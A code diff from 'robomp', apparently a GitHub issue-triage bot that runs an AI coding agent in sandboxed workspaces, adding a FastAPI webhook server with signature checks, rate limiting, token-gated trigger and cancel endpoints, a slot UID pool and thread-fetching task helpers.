"natives" / "native" + # NOTE: we deliberately do NOT require `native_dir.exists()` here. On + # a cache miss `populate_workspace` returns None without creating any + # directory; on a hit it mkdirs and copies in. That's the right + # behavior — a hit by definition implies this repo's source state + # produces natives, so creating the dir is correct. + try: + key = natives_compute_key(workspace.repo_dir) + except (subprocess.CalledProcessError, RuntimeError, OSError) as exc: + log.debug( + "natives_cache key compute failed", + extra={"workspace": workspace.workspace_key, "err": redact_credentials(str(exc))}, + ) + return + try: + hit = cache.populate_workspace(workspace.repo_full_name, key, native_dir) + except OSError as exc: + log.warning( + "natives_cache populate failed", + extra={"workspace": workspace.workspace_key, "key": key, "err": str(exc)}, + ) + return + if hit is not None and _slot_permissions_active(slot_uid): + assert slot_uid is not None + self._chown_natives_for_slot(native_dir, hit, slot_uid=slot_uid) + log.info( + "natives_cache", + extra={ + "action": "hit" if hit is not None else "miss", + "workspace": workspace.workspace_key, + "repo": workspace.repo_full_name, + "key": key, + "files": [str(p.name) for p in hit.files] if hit is not None else [], + }, + ) + + @staticmethod + def _chown_natives_for_slot(native_dir: Path, hit: CacheHit, *, slot_uid: int) -> None: + """Hand the populated native dir to the slot WITHOUT touching the + hardlinked `.node` inodes (those are shared with the cache). + + Files whose names match a cached `.node` are skipped — they are + hardlinks back into the root:omp cache and the slot reads them via + group `omp`. Everything else (the directory itself, copied + companions) is chowned to the slot so the slot can rebuild via + temp + rename. + """ + try: + os.chown(native_dir, slot_uid, slot_uid) + except OSError as exc: + log.warning("natives_cache chown dir failed", extra={"err": str(exc)}) + return + node_basenames = {p.name for p in hit.files if p.name.endswith(".node")} + for child in native_dir.iterdir(): + if child.name in node_basenames: + continue # hardlink to cache — must not chown + try: + os.chown(child, slot_uid, slot_uid, follow_symlinks=False) + except OSError as exc: + log.warning( + "natives_cache chown companion failed", + extra={"file": str(child), "err": str(exc)}, + ) + + def remove_workspace(self, *, repo: str, number: int) -> None: + ws_root = self.workspace_root(repo, number) + repo_dir = ws_root / "repo" + if repo_dir.exists(): + pool = self.pool_path(repo) + _safe_run(["git", "worktree", "remove", "--force", str(repo_dir)], cwd=pool) + if repo_dir.exists(): + shutil.rmtree(repo_dir, ignore_errors=True) + if ws_root.exists(): + shutil.rmtree(ws_root, ignore_errors=True) + + +__all__ = [ + "GitCommandError", + "GitTransport", + "LocalGitTransport", + "SandboxManager", + "Workspace", + "make_branch", + "rename_workspace_branch", + "validate_branch_slug", + "redact_credentials", + "workspace_key", +] diff --git a/python/robomp/src/server.py b/python/robomp/src/server.py new file mode 100644 index 000000000..2cab9702f --- /dev/null +++ b/python/robomp/src/server.py @@ -0,0 +1,790 @@ +"""FastAPI receiver for GitHub webhooks.""" + +from __future__ import annotations + +import asyncio +import logging +import time +from collections.abc import AsyncIterator, Awaitable, Callable, Mapping +from contextlib import asynccontextmanager +from dataclasses import dataclass +from typing import Any + +from fastapi import Body, FastAPI, Header, HTTPException, Request, status +from fastapi.responses import HTMLResponse, JSONResponse +from fastapi.staticfiles import StaticFiles + +from robomp import github_events +from robomp.autoclose import AutocloseScheduler +from robomp.config import Settings, get_settings +from robomp.dashboard import render_index, static_dir, tail_jsonl +from robomp.db import ( + INACTIVE_EVENT_STATES, + Database, + get_database, + iso_seconds_ago, +) +from robomp.db import ( + issue_key as make_issue_key, +) +from robomp.github_backend import GitHubBackend +from robomp.github_client import GitHubError, IssueSummary +from robomp.manual_triage import ( + InvalidIssueRef, + ManualTriageConflict, + ManualTriageError, + enqueue_manual_triage, + parse_issue_ref, +) +from robomp.natives_cache import NativesCache +from robomp.proxy_client import GitHubProxyClient, ProxyGitTransport +from robomp.queue import WorkerPool +from robomp.sandbox import SandboxManager + +log = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _IssueBrowseCacheEntry: + repos: tuple[str, ...] + issues: list[IssueSummary] + errors: list[dict[str, str]] + fetched_at: float + + +class _IssueBrowseCache: + """In-process cache for the dashboard's GitHub issue browser. + + The browse panel is a convenience picker. It should not hit GitHub's + `/issues` endpoint on every browser reload because that endpoint returns PRs + mixed into the issue list. Webhooks keep warmed entries fresh; the dashboard + Refresh button can still force a live pull when an operator wants one. + """ + + def __init__(self) -> None: + self._entries: dict[tuple[str, int, tuple[str, ...]], _IssueBrowseCacheEntry] = {} + self._lock = asyncio.Lock() + + async def get_or_fetch( + self, + *, + state: str, + limit: int, + repos: tuple[str, ...], + force: bool, + fetch: Callable[[], Awaitable[tuple[list[IssueSummary], list[dict[str, str]]]]], + ) -> tuple[_IssueBrowseCacheEntry, bool]: + key = (state, limit, repos) + async with self._lock: + if not force and (entry := self._entries.get(key)) is not None: + return entry, True + + issues, errors = await fetch() + issues.sort(key=lambda s: s.updated_at, reverse=True) + entry = _IssueBrowseCacheEntry( + repos=repos, + issues=issues[:limit], + errors=errors, + fetched_at=time.time(), + ) + async with self._lock: + if not force and (current := self._entries.get(key)) is not None: + return current, True + self._entries[key] = entry + return entry, False + + async def apply_webhook( + self, + *, + event_type: str, + payload: Mapping[str, Any], + allowlist: frozenset[str], + ) -> None: + mutation = _issue_cache_mutation(event_type, payload, allowlist) + if mutation is None: + return + repo, number, summary = mutation + async with self._lock: + for (state, limit, repos), entry in self._entries.items(): + if repo not in repos: + continue + entry.issues = [item for item in entry.issues if not (item.repo == repo and item.number == number)] + if summary is not None and _cache_state_includes(state, summary.state): + entry.issues.append(summary) + entry.issues.sort(key=lambda s: s.updated_at, reverse=True) + del entry.issues[limit:] + + +def _cache_state_includes(cache_state: str, issue_state: str) -> bool: + return cache_state == "all" or issue_state == cache_state + + +def _repo_full_name(payload: Mapping[str, Any]) -> str | None: + repo = payload.get("repository") + if isinstance(repo, Mapping): + full_name = repo.get("full_name") + if isinstance(full_name, str) and full_name: + return full_name + return None + + +def _label_names(raw: Any) -> tuple[str, ...]: + if not isinstance(raw, (list, tuple)): + return () + return tuple(str(label.get("name") or "") if isinstance(label, Mapping) else str(label) for label in raw) + + +def _issue_summary_from_payload(repo: str, issue: Mapping[str, Any]) -> IssueSummary | None: + number = issue.get("number") + if not isinstance(number, int): + return None + user = issue.get("user") + state = str(issue.get("state") or "open").lower() + if state not in {"open", "closed"}: + state = "open" + comments = issue.get("comments") + if not isinstance(comments, int): + comments = 0 + return IssueSummary( + repo=repo, + number=number, + title=str(issue.get("title") or ""), + state=state, + author=str(user.get("login") or "") if isinstance(user, Mapping) else "", + labels=_label_names(issue.get("labels")), + comments=comments, + updated_at=str(issue.get("updated_at") or issue.get("created_at") or ""), + created_at=str(issue.get("created_at") or ""), + html_url=str(issue.get("html_url") or f"https://github.com/{repo}/issues/{number}"), + ) + + +def _issue_cache_mutation( + event_type: str, + payload: Mapping[str, Any], + allowlist: frozenset[str], +) -> tuple[str, int, IssueSummary | None] | None: + if event_type not in {"issues", "issue_comment"}: + return None + repo = _repo_full_name(payload) + if repo is None or repo.lower() not in allowlist: + return None + issue = payload.get("issue") + if not isinstance(issue, Mapping): + return None + number = issue.get("number") + if not isinstance(number, int): + return None + if "pull_request" in issue: + return repo, number, None + if str(payload.get("action") or "") == "deleted": + return repo, number, None + summary = _issue_summary_from_payload(repo, issue) + if summary is None: + return None + return repo, number, summary + + +def _issue_browse_payload( + *, + entry: _IssueBrowseCacheEntry, + cache_hit: bool, + processed_keys: frozenset[str], +) -> dict[str, Any]: + return { + "issues": [ + { + "repo": s.repo, + "number": s.number, + "title": s.title, + "state": s.state, + "author": s.author, + "labels": list(s.labels), + "comments": s.comments, + "updated_at": s.updated_at, + "created_at": s.created_at, + "html_url": s.html_url, + "processed": make_issue_key(s.repo, s.number) in processed_keys, + } + for s in entry.issues + ], + "errors": [dict(error) for error in entry.errors], + "repos": list(entry.repos), + "cache": {"hit": cache_hit, "fetched_at": entry.fetched_at}, + } + + +def _require_proxy_mode(cfg: Settings) -> tuple[str, bytes]: + if cfg.github_token is not None: + raise SystemExit( + "robomp orchestrator refuses to start with GITHUB_TOKEN set in env. " + "The PAT must live only in the gh-proxy container." + ) + if cfg.gh_proxy_url is None or cfg.gh_proxy_hmac_key is None: + raise SystemExit( + "robomp orchestrator requires ROBOMP_GH_PROXY_URL and " + "ROBOMP_GH_PROXY_HMAC_KEY (run gh-proxy in a sibling container)." + ) + return cfg.gh_proxy_url, cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8") + + +def _build_orchestrator(cfg: Settings) -> tuple[GitHubBackend, ProxyGitTransport]: + base_url, key = _require_proxy_mode(cfg) + github = GitHubProxyClient(base_url=base_url, hmac_key=key) + transport = ProxyGitTransport(base_url=base_url, hmac_key=key) + return github, transport + + +def _build_state(settings: Settings) -> dict[str, Any]: + db = get_database(settings.sqlite_path) + github, git_transport = _build_orchestrator(settings) + natives_cache: NativesCache | None = None + if settings.natives_cache_enabled: + natives_cache = NativesCache( + settings.natives_cache_root, + max_entries_per_repo=settings.natives_cache_max_entries_per_repo, + max_bytes=settings.natives_cache_max_bytes, + ) + sandbox = SandboxManager( + settings.workspace_root, + transport=git_transport, + natives_cache=natives_cache, + ) + pool = WorkerPool(settings=settings, db=db, github=github, sandbox=sandbox, git_transport=git_transport) + autoclose = AutocloseScheduler(settings=settings, db=db, github=github) + return { + "settings": settings, + "db": db, + "github": github, + "git_transport": git_transport, + "sandbox": sandbox, + "natives_cache": natives_cache, + "pool": pool, + "issue_browse_cache": _IssueBrowseCache(), + "autoclose": autoclose, + } + + +def create_app(settings: Settings | None = None) -> FastAPI: + """Build the FastAPI app. `settings` parameter is for tests.""" + + @asynccontextmanager + async def lifespan(app: FastAPI) -> AsyncIterator[None]: + cfg = settings or get_settings() + cfg.ensure_paths() + app.state.bag = _build_state(cfg) + app.state.bag["started_at"] = time.time() + pool: WorkerPool = app.state.bag["pool"] + await pool.start() + autoclose: AutocloseScheduler = app.state.bag["autoclose"] + await autoclose.start() + try: + yield + finally: + await autoclose.stop() + await pool.stop( + drain_timeout=cfg.shutdown_drain_timeout_seconds, + kill_timeout=cfg.shutdown_kill_timeout_seconds, + ) + + app = FastAPI(title="robomp", version="0.1.0", lifespan=lifespan) + + @app.get("/healthz") + async def healthz() -> dict[str, str]: + return {"status": "ok"} + + @app.get("/readyz") + async def readyz(request: Request) -> dict[str, str]: + pool = request.app.state.bag.get("pool") + if pool is None: + raise HTTPException(503, "not initialized") + return {"status": "ready"} + + @app.post("/webhook/github") + async def webhook( + request: Request, + x_github_event: str = Header(..., alias="X-GitHub-Event"), + x_github_delivery: str = Header(..., alias="X-GitHub-Delivery"), + x_hub_signature_256: str | None = Header(None, alias="X-Hub-Signature-256"), + ) -> JSONResponse: + bag = request.app.state.bag + cfg: Settings = bag["settings"] + body = await request.body() + if not github_events.verify_signature( + cfg.github_webhook_secret.get_secret_value(), + body, + x_hub_signature_256, + ): + raise HTTPException(status.HTTP_401_UNAUTHORIZED, "invalid signature") + try: + payload = await request.json() + except Exception as exc: + raise HTTPException(status.HTTP_400_BAD_REQUEST, f"invalid json: {exc}") from exc + + db: Database = bag["db"] + issue_cache: _IssueBrowseCache = bag["issue_browse_cache"] + await issue_cache.apply_webhook( + event_type=x_github_event, + payload=payload, + allowlist=cfg.repo_allowlist, + ) + + def _resolve(repo_full: str, pr_number: int) -> str | None: + row = db.find_issue_by_pr(repo_full, pr_number) + return row.key if row else None + + decision = github_events.route( + x_github_event, + payload, + allowlist=cfg.repo_allowlist, + bot_login=cfg.bot_login, + maintainers=cfg.maintainer_logins, + reviewer_bots=cfg.reviewer_bots, + resolve_issue_from_pr=_resolve, + ) + + # Auto-close cancellation hooks. A pending question-issue closure is + # cancelled synchronously the moment any human signal arrives: + # follow-up comment in the issue thread, or the issue being closed + # externally. The DAO is a no-op when no row exists or it's already + # past `pending`, so this is safe to fire on every routed event. + if decision.issue_key: + cancel_reason: str | None = None + if ( + x_github_event == "issue_comment" + and str(payload.get("action") or "") == "created" + and decision.task == "handle_comment" + ): + cancel_reason = "user_replied" + elif x_github_event == "issues" and str(payload.get("action") or "") == "closed": + cancel_reason = "externally_closed" + if cancel_reason is not None: + cancelled = db.cancel_pending_closure(decision.issue_key, reason=cancel_reason) + if cancelled: + log.info( + "autoclose cancelled", + extra={ + "issue_key": decision.issue_key, + "reason": cancel_reason, + "event": x_github_event, + }, + ) + + # Persist directive metadata on the stored payload so the durable + # queue (and any replay) carries the maintainer signal forward. + if decision.directive: + payload = dict(payload) + payload["_robomp_directive"] = { + "body": decision.directive_body, + "author": decision.directive_author, + "pragmas": [list(item) for item in decision.directive_pragmas], + } + + if not decision.should_queue: + log.info("skip", extra={"event": x_github_event, "reason": decision.reason}) + db.record_event( + delivery_id=x_github_delivery, + event_type=x_github_event, + repo=decision.repo, + issue_key=decision.issue_key, + payload=payload, + state="skipped", + last_error=decision.reason, + ) + return JSONResponse({"delivery": x_github_delivery, "state": "skipped"}, status_code=202) + + # Per-user rate limiting. Lifecycle events (cleanup) carry no submitter + # and are not gated. For everything user-driven, atomically record the + # accepted delivery while checking the rolling window against the tier cap. + submitter = decision.submitter + if submitter: + cap = github_events.rate_limit_cap( + submitter, + decision.association, + unlimited=cfg.rate_limit_unlimited | cfg.maintainer_logins, + default=cfg.rate_limit_default, + contributor=cfg.rate_limit_contributor, + ) + since = iso_seconds_ago(cfg.rate_limit_window_seconds) + admission = db.admit_submission( + delivery_id=x_github_delivery, + login=submitter, + repo=decision.repo, + since=since, + cap=cap, + ) + if not admission.accepted: + window = int(cfg.rate_limit_window_seconds) + reason = f"rate limit: @{submitter} has used {admission.used}/{cap} submissions in the last {window}s" + log.info( + "rate_limited", + extra={ + "event": x_github_event, + "delivery": x_github_delivery, + "login": submitter, + "association": decision.association, + "used": admission.used, + "cap": cap, + }, + ) + db.record_event( + delivery_id=x_github_delivery, + event_type=x_github_event, + repo=decision.repo, + issue_key=decision.issue_key, + payload=payload, + state="skipped", + last_error=reason, + ) + return JSONResponse( + {"delivery": x_github_delivery, "state": "skipped", "reason": "rate_limited"}, + status_code=202, + ) + + inserted = db.record_event( + delivery_id=x_github_delivery, + event_type=x_github_event, + repo=decision.repo, + issue_key=decision.issue_key, + payload=payload, + state="queued", + ) + if inserted: + pool: WorkerPool = bag["pool"] + pool.wake() + log.info( + "queued", extra={"event": x_github_event, "delivery": x_github_delivery, "key": decision.issue_key} + ) + else: + log.info("duplicate", extra={"event": x_github_event, "delivery": x_github_delivery}) + return JSONResponse({"delivery": x_github_delivery, "state": "queued"}, status_code=202) + + @app.post("/replay") + async def replay( + request: Request, + x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"), + delivery_id: str = "", + ) -> JSONResponse: + bag = request.app.state.bag + cfg: Settings = bag["settings"] + if cfg.replay_token is None: + raise HTTPException(404, "replay disabled") + if x_robomp_token != cfg.replay_token.get_secret_value(): + raise HTTPException(401, "invalid replay token") + db: Database = bag["db"] + row = db.get_event(delivery_id) + if row is None: + raise HTTPException(404, "unknown delivery") + if not db.requeue_event(delivery_id, from_states=INACTIVE_EVENT_STATES): + raise HTTPException(409, f"delivery {delivery_id} is {row.state}; only inactive events can be replayed") + bag["pool"].wake() + return JSONResponse({"delivery": delivery_id, "state": "queued"}) + + def _require_trigger_token(cfg: Settings, token: str | None) -> None: + if cfg.replay_token is None: + raise HTTPException(404, "trigger disabled (set ROBOMP_REPLAY_TOKEN to enable)") + if token != cfg.replay_token.get_secret_value(): + raise HTTPException(401, "invalid replay token") + + @app.get("/api/github/issues") + async def api_github_issues( + request: Request, + state: str = "open", + limit: int = 30, + refresh: bool = False, + x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"), + ) -> dict[str, Any]: + """Browse issues across `ROBOMP_REPO_ALLOWLIST` for the trigger picker. + + Token-gated identically to `/api/trigger`: this can expose titles from + private repos. Normal dashboard loads use the server cache; only cache + misses and explicit refreshes hit GitHub. + """ + bag = request.app.state.bag + cfg: Settings = bag["settings"] + _require_trigger_token(cfg, x_robomp_token) + + if state not in ("open", "closed", "all"): + raise HTTPException(400, "state must be open|closed|all") + capped = max(1, min(int(limit), 100)) + github: GitHubBackend = bag["github"] + issue_cache: _IssueBrowseCache = bag["issue_browse_cache"] + repos = tuple(sorted(cfg.repo_allowlist)) + if not repos: + return {"issues": [], "errors": [], "repos": [], "cache": {"hit": False, "fetched_at": time.time()}} + + async def _fetch() -> tuple[list[IssueSummary], list[dict[str, str]]]: + # Fan out across allowlisted repos; per-repo failures don't take down the panel. + async def _one(repo: str) -> tuple[str, list[IssueSummary], str | None]: + try: + items = await github.list_issues(repo, state=state, limit=capped) + return repo, items, None + except Exception as exc: # GitHubError, network, etc. + log.warning("list_issues failed", extra={"repo": repo, "err": str(exc)}) + return repo, [], str(exc) + + results = await asyncio.gather(*(_one(r) for r in repos)) + merged: list[IssueSummary] = [] + errors: list[dict[str, str]] = [] + for repo, items, err in results: + if err is not None: + errors.append({"repo": repo, "error": err}) + merged.extend(items) + return merged, errors + + entry, cache_hit = await issue_cache.get_or_fetch( + state=state, + limit=capped, + repos=repos, + force=refresh, + fetch=_fetch, + ) + # `processed` is not cached: a freshly-triaged issue must immediately + # disappear from the "fresh issues" filter on the next dashboard refresh. + db: Database = bag["db"] + processed = frozenset(db.processed_issue_keys(make_issue_key(s.repo, s.number) for s in entry.issues)) + return _issue_browse_payload(entry=entry, cache_hit=cache_hit, processed_keys=processed) + + @app.post("/api/trigger") + async def api_trigger( + request: Request, + payload: dict[str, Any] = Body(...), + x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"), + ) -> JSONResponse: + """Manually queue an issue. Modes: + + - `triage`: fetch fresh from GitHub and enqueue (or re-enqueue) as if `issues.opened`. + - `retry`: requeue an existing stored event. Identify it by `delivery_id` or `issue`. + """ + bag = request.app.state.bag + cfg: Settings = bag["settings"] + _require_trigger_token(cfg, x_robomp_token) + + db: Database = bag["db"] + github: GitHubBackend = bag["github"] + pool: WorkerPool = bag["pool"] + + mode = str(payload.get("mode") or "").strip().lower() + if mode not in ("triage", "retry"): + raise HTTPException(400, "mode must be 'triage' or 'retry'") + + issue_ref = payload.get("issue") + delivery_id = payload.get("delivery_id") + + if mode == "triage": + if not isinstance(issue_ref, str) or not issue_ref: + raise HTTPException(400, "triage requires 'issue' = 'owner/repo#NN'") + try: + repo_full, number = parse_issue_ref(issue_ref) + except InvalidIssueRef as exc: + raise HTTPException(400, str(exc)) from exc + if not cfg.allows(repo_full): + raise HTTPException(403, f"{repo_full} not in ROBOMP_REPO_ALLOWLIST") + try: + delivery = await enqueue_manual_triage( + db=db, + github=github, + repo_full=repo_full, + number=number, + ) + except ManualTriageConflict as exc: + raise HTTPException(409, str(exc)) from exc + except ManualTriageError as exc: + raise HTTPException(400, str(exc)) from exc + except GitHubError as exc: + raise HTTPException(502, f"github error: {exc.status} {exc.message}") from exc + pool.wake() + log.info("manual triage", extra={"delivery": delivery, "issue": f"{repo_full}#{number}"}) + return JSONResponse( + {"delivery": delivery, "state": "queued", "mode": "triage"}, + status_code=202, + ) + + # mode == "retry" + if isinstance(delivery_id, str) and delivery_id: + target = delivery_id + elif isinstance(issue_ref, str) and issue_ref: + try: + repo_full, number = parse_issue_ref(issue_ref) + except InvalidIssueRef as exc: + raise HTTPException(400, str(exc)) from exc + if not cfg.allows(repo_full): + raise HTTPException(403, f"{repo_full} not in ROBOMP_REPO_ALLOWLIST") + row = db.latest_event_for_issue(make_issue_key(repo_full, number)) + if row is None: + raise HTTPException(404, f"no retryable stored event for {repo_full}#{number}") + target = row.delivery_id + else: + raise HTTPException(400, "retry requires 'delivery_id' or 'issue'") + + event = db.get_event(target) + if event is None: + raise HTTPException(404, f"unknown delivery {target}") + if not db.requeue_event(target, from_states=INACTIVE_EVENT_STATES): + raise HTTPException(409, f"delivery {target} is {event.state}; only inactive events can be retried") + pool.wake() + log.info("manual retry", extra={"delivery": target}) + return JSONResponse( + {"delivery": target, "state": "queued", "mode": "retry"}, + status_code=202, + ) + + @app.post("/api/cancel") + async def api_cancel( + request: Request, + payload: dict[str, Any] = Body(...), + x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"), + ) -> JSONResponse: + """Stop a running event. The omp subprocess is killed; the row lands in + `failed` with `cancelled by operator` as the error. + """ + bag = request.app.state.bag + cfg: Settings = bag["settings"] + _require_trigger_token(cfg, x_robomp_token) + + delivery_id = payload.get("delivery_id") + if not isinstance(delivery_id, str) or not delivery_id: + raise HTTPException(400, "cancel requires 'delivery_id'") + + db: Database = bag["db"] + event = db.get_event(delivery_id) + if event is None: + raise HTTPException(404, f"unknown delivery {delivery_id}") + + pool: WorkerPool = bag["pool"] + fired = await pool.cancel_event(delivery_id) + log.info( + "manual cancel", + extra={"delivery": delivery_id, "fired": fired, "state": event.state}, + ) + return JSONResponse( + {"delivery": delivery_id, "fired": fired, "previous_state": event.state}, + status_code=202, + ) + + @app.get("/events") + async def events(request: Request, limit: int = 50) -> dict[str, Any]: + rows = request.app.state.bag["db"].list_events(limit=limit) + return { + "events": [ + { + "delivery_id": r.delivery_id, + "event_type": r.event_type, + "repo": r.repo, + "issue_key": r.issue_key, + "state": r.state, + "attempts": r.attempts, + "received_at": r.received_at, + "last_error": r.last_error, + } + for r in rows + ] + } + + @app.get("/issues") + async def issues(request: Request, limit: int = 100) -> dict[str, Any]: + rows = request.app.state.bag["db"].list_issues(limit=limit) + return { + "issues": [ + { + "key": r.key, + "repo": r.repo, + "number": r.number, + "branch": r.branch, + "pr_number": r.pr_number, + "state": r.state, + "classification": r.classification, + "updated_at": r.updated_at, + } + for r in rows + ] + } + + @app.get("/", response_class=HTMLResponse) + async def index(request: Request) -> HTMLResponse: + cfg: Settings = request.app.state.bag["settings"] + token = cfg.replay_token.get_secret_value() if cfg.replay_token else None + return HTMLResponse(render_index(token)) + + @app.get("/api/status") + async def api_status(request: Request) -> dict[str, Any]: + bag = request.app.state.bag + cfg: Settings = bag["settings"] + db: Database = bag["db"] + pool: WorkerPool = bag["pool"] + started = float(bag.get("started_at") or time.time()) + issues_rows = db.list_issues(limit=200) + latest_events = db.latest_events_for_issues(r.key for r in issues_rows) + + def _latest_event_payload(key: str) -> dict[str, Any] | None: + latest = latest_events.get(key) + if latest is None: + return None + return { + "delivery_id": latest.delivery_id, + "event_type": latest.event_type, + "state": latest.state, + "attempts": latest.attempts, + "received_at": latest.received_at, + "last_error": latest.last_error, + } + + events_rows = db.list_events(limit=25) + return { + "runtime": { + "bot_login": cfg.bot_login, + "repo_allowlist": sorted(cfg.repo_allowlist), + "max_concurrency": cfg.max_concurrency, + "model": cfg.model, + "thinking_level": cfg.thinking_level, + "uptime_seconds": max(0.0, time.time() - started), + }, + "event_counts": db.event_state_counts(), + "issue_event_counts": db.latest_issue_event_state_counts(), + "running_events": db.list_running_events(), + "inflight": await pool.inflight_snapshot(), + "issues": [ + { + "key": r.key, + "repo": r.repo, + "number": r.number, + "branch": r.branch, + "pr_number": r.pr_number, + "state": r.state, + "classification": r.classification, + "updated_at": r.updated_at, + "latest_event": _latest_event_payload(r.key), + } + for r in issues_rows + ], + "recent_events": [ + { + "delivery_id": r.delivery_id, + "event_type": r.event_type, + "repo": r.repo, + "issue_key": r.issue_key, + "state": r.state, + "attempts": r.attempts, + "received_at": r.received_at, + "last_error": r.last_error, + } + for r in events_rows + ], + } + + @app.get("/api/logs") + async def api_logs(request: Request, limit: int = 400) -> dict[str, Any]: + cfg: Settings = request.app.state.bag["settings"] + capped = max(1, min(int(limit), 2000)) + entries = tail_jsonl(cfg.log_dir / "robomp.log.jsonl", limit=capped) + return {"entries": entries, "count": len(entries), "limit": capped} + + # Mount the built dashboard bundle. The `index.html` itself is served by + # the `@app.get("/")` handler above so the per-instance replay-token can + # be substituted; `/static/*` carries the hashed JS/CSS produced by Vite. + app.mount("/static", StaticFiles(directory=static_dir()), name="static") + + return app + + +__all__ = ["create_app"] diff --git a/python/robomp/src/slot_pool.py b/python/robomp/src/slot_pool.py new file mode 100644 index 000000000..4598594ae --- /dev/null +++ b/python/robomp/src/slot_pool.py @@ -0,0 +1,37 @@ +from __future__ import annotations + +import asyncio +from collections.abc import Iterable + + +class SlotPool: + def __init__(self, slot_uids: Iterable[int] = ()) -> None: + self._slot_uids = tuple(slot_uids) + if len(self._slot_uids) != len(set(self._slot_uids)): + raise ValueError("slot UIDs must be unique") + + self._available: asyncio.Queue[int] = asyncio.Queue() + for slot_uid in self._slot_uids: + self._available.put_nowait(slot_uid) + self._checked_out: set[int] = set() + + @property + def slot_uids(self) -> tuple[int, ...]: + return self._slot_uids + + async def acquire(self) -> int | None: + if not self._slot_uids: + return None + + slot_uid = await self._available.get() + self._checked_out.add(slot_uid) + return slot_uid + + def release(self, slot_uid: int | None) -> None: + if not self._slot_uids and slot_uid is None: + return + if slot_uid is None or slot_uid not in self._checked_out: + raise ValueError("slot UID was not acquired") + + self._checked_out.remove(slot_uid) + self._available.put_nowait(slot_uid) diff --git a/python/robomp/src/tasks.py b/python/robomp/src/tasks.py new file mode 100644 index 000000000..af75bb632 --- /dev/null +++ b/python/robomp/src/tasks.py @@ -0,0 +1,709 @@ +"""Task entry points dispatched off the durable event queue.""" + +from __future__ import annotations + +import logging +from collections.abc import Mapping +from typing import Any + +from robomp import persona +from robomp.config import Settings +from robomp.db import Database, IssueRow, IssueState, issue_key +from robomp.github_backend import GitHubBackend +from robomp.github_client import ( + CommentInfo, + GitHubError, + IssueInfo, + PullRequestInfo, + RepoInfo, + parse_issue_payload, +) +from robomp.sandbox import GitTransport, SandboxManager +from robomp.worker import DirectiveInfo, TaskInputs, ThreadMessage, run_task + +log = logging.getLogger(__name__) + + +def _comment_from_payload(payload: Mapping[str, Any]) -> CommentInfo: + c = payload.get("comment") or {} + user = c.get("user") or {} + return CommentInfo( + id=int(c.get("id") or 0), + author=str(user.get("login") or ""), + body=str(c.get("body") or ""), + created_at=str(c.get("created_at") or ""), + ) + + +def _directive_from_payload(payload: Mapping[str, Any]) -> DirectiveInfo | None: + """Extract the maintainer directive the webhook handler stashed, if any.""" + raw = payload.get("_robomp_directive") + if not isinstance(raw, Mapping): + return None + body = raw.get("body") + author = raw.get("author") + if not isinstance(body, str) or not body.strip(): + return None + if not isinstance(author, str) or not author.strip(): + return None + pragmas: list[tuple[str, str]] = [] + raw_pragmas = raw.get("pragmas") + if isinstance(raw_pragmas, list): + for entry in raw_pragmas: + if isinstance(entry, (list, tuple)) and len(entry) == 2: + k, v = entry + if isinstance(k, str) and isinstance(v, str): + pragmas.append((k, v)) + return DirectiveInfo(body=body, author=author, pragmas=tuple(pragmas)) + + +async def _fetch_thread( + github: GitHubBackend, + repo: str, + number: int, + *, + is_pr: bool, +) -> tuple[ThreadMessage, ...]: + """Pull the full conversation thread (body + comments + reviews) for `number`. + + Best-effort: any sub-fetch that fails is logged + dropped so a stale + review-comments endpoint doesn't block the directive from running. + """ + messages: list[ThreadMessage] = [] + + # 1. The issue / PR body itself. Use get_issue (issues endpoint also + # returns PRs in GitHub's data model). + try: + item = await github.get_issue(repo, number) + if item.body and item.body.strip(): + messages.append( + ThreadMessage( + kind="pr_body" if is_pr else "issue_body", + author=item.author or "", + body=item.body, + created_at="", # not exposed by IssueInfo + ) + ) + except GitHubError as exc: + log.warning("thread body fetch failed", extra={"repo": repo, "n": number, "err": str(exc)}) + + # 2. Conversation comments (issue OR PR conversation). + try: + for c in await github.list_comments(repo, number): + messages.append( + ThreadMessage( + kind="comment", + author=c.author, + body=c.body, + created_at=c.created_at, + ) + ) + except GitHubError as exc: + log.warning("thread comments fetch failed", extra={"err": str(exc)}) + + if is_pr: + # 3. Inline review comments (attached to a path:line). + try: + for r in await github.list_review_comments(repo, number): + messages.append( + ThreadMessage( + kind="review_comment", + author=r.author, + body=r.body, + created_at=r.created_at, + path=r.path, + line=r.line, + ) + ) + except GitHubError as exc: + log.warning("thread review-comments fetch failed", extra={"err": str(exc)}) + # 4. Top-level reviews (summaries). + try: + for rv in await github.list_pr_reviews(repo, number): + messages.append( + ThreadMessage( + kind="review", + author=rv.author, + body=rv.body, + created_at=rv.submitted_at, + state=rv.state, + ) + ) + except GitHubError as exc: + log.warning("thread reviews fetch failed", extra={"err": str(exc)}) + + # ISO 8601 strings sort chronologically. Body has no timestamp so it + # sorts first (empty string < any "2026-…" string). + messages.sort(key=lambda m: m.created_at or "") + return tuple(messages) + + +async def _attach_thread( + github: GitHubBackend, + directive: DirectiveInfo | None, + repo: str, + number: int, + *, + is_pr: bool, +) -> DirectiveInfo | None: + """Hydrate a directive with the live conversation thread (or no-op if None).""" + if directive is None: + return None + thread = await _fetch_thread(github, repo, number, is_pr=is_pr) + return DirectiveInfo(body=directive.body, author=directive.author, thread=thread, pragmas=directive.pragmas) + + +async def _resolve_repo_and_issue( + github: GitHubBackend, + payload: Mapping[str, Any], +) -> tuple[RepoInfo, IssueInfo]: + repo, issue = parse_issue_payload(payload) + if not issue.body: + # Webhook payloads sometimes omit body; refetch to be safe. + try: + issue = await github.get_issue(repo.full_name, issue.number) + except GitHubError as exc: + log.warning("issue refetch failed", extra={"err": str(exc)}) + return repo, issue + + +async def _resolve_issue_row_for_pr( + *, + db: Database, + github: GitHubBackend, + repo_full: str, + pr_number: int, +) -> tuple[IssueRow | None, PullRequestInfo | None]: + """Find the originating issue row for a PR, repairing stale mappings when possible.""" + issue_row = db.find_issue_by_pr(repo_full, pr_number) + pr_info: PullRequestInfo | None = None + if issue_row is None or issue_row.branch is None: + try: + pr_info = await github.get_pull_request(repo_full, pr_number) + except GitHubError as exc: + log.warning("PR metadata fetch failed", extra={"repo": repo_full, "pr": pr_number, "err": str(exc)}) + return issue_row, None + + if issue_row is None and pr_info is not None and pr_info.head_ref: + issue_row = db.find_issue_by_branch(repo_full, pr_info.head_ref) + if issue_row is not None: + db.set_issue_pr(issue_row.key, pr_number) 